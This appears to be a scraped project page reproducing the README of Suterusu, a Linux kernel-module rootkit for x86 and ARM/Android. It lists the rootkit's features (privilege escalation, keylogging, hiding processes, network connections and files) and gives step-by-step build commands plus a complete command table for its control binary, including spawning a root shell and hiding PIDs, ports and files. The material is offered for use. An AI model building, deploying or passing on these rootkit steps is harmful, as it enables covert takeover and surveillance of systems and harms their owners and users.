Suterusu
Fork from http://redmine.poppopret.org/projects/suterusu. An LKM rootkit targeting Linux 2.6/3.x on x86 and ARM. Supports privilege escalation, process hiding, connection hiding (TCP/UDP v4/v6), file/directory hiding, keylogging, and screen unlocking. Under active development.
Install / Use
/learn @dschuermann/SuterusuREADME
Suterusu
Typical compilation steps:
$ wget http://kernel.org/linux-x.x.x.tar.gz $ tar xvf linux-x.x.x.tar.gz $ cd linux-x.x.x $ make menuconfig $ make modules_prepare $ cd /path/to/suterusu $ make linux-x86 KDIR=/path/to/kernel
To compile against the currently running kernel (kernel headers installed):
$ make linux-x86 KDIR=/lib/modules/$(uname -r)/build
If a specific toolchain is desired for cross-compilation, provide the CROSS_COMPILE variable during make:
$ make android-arm CROSS_COMPILE=arm-linux-androideabi- KDIR=/path/to/kernel
To compile the command binary: $ gcc sock.c -o sock
Commands
Root shell $ ./sock 0
Hide PID $ ./sock 1 [pid]
Unhide PID $ ./sock 2 [pid]
Hide TCPv4 port $ ./sock 3 [port]
Unhide TCPv4 port $ ./sock 4 [port]
Hide TCPv6 port $ ./sock 5 [port]
Unhide TCPv6 port $ ./sock 6 [port]
Hide UDPv4 port $ ./sock 7 [port]
Unhide UDPv4 port $ ./sock 8 [port]
Hide UDPv6 port $ ./sock 9 [port]
Unhide UDPv6 port $ ./sock 10 [port]
Hide file/directory $ ./sock 11 [name]
Unhide file/directory $ ./sock 12 [name]
Note: At the moment, file/dir hiding only hides names in / directory
Related Skills
node-connect
342.0kDiagnose OpenClaw node connection and pairing failures for Android, iOS, and macOS companion apps
frontend-design
84.7kCreate distinctive, production-grade frontend interfaces with high design quality. Use this skill when the user asks to build web components, pages, or applications. Generates creative, polished code that avoids generic AI aesthetics.
openai-whisper-api
342.0kTranscribe audio via OpenAI Audio Transcriptions API (Whisper).
commit-push-pr
84.7kCommit, push, and open a PR
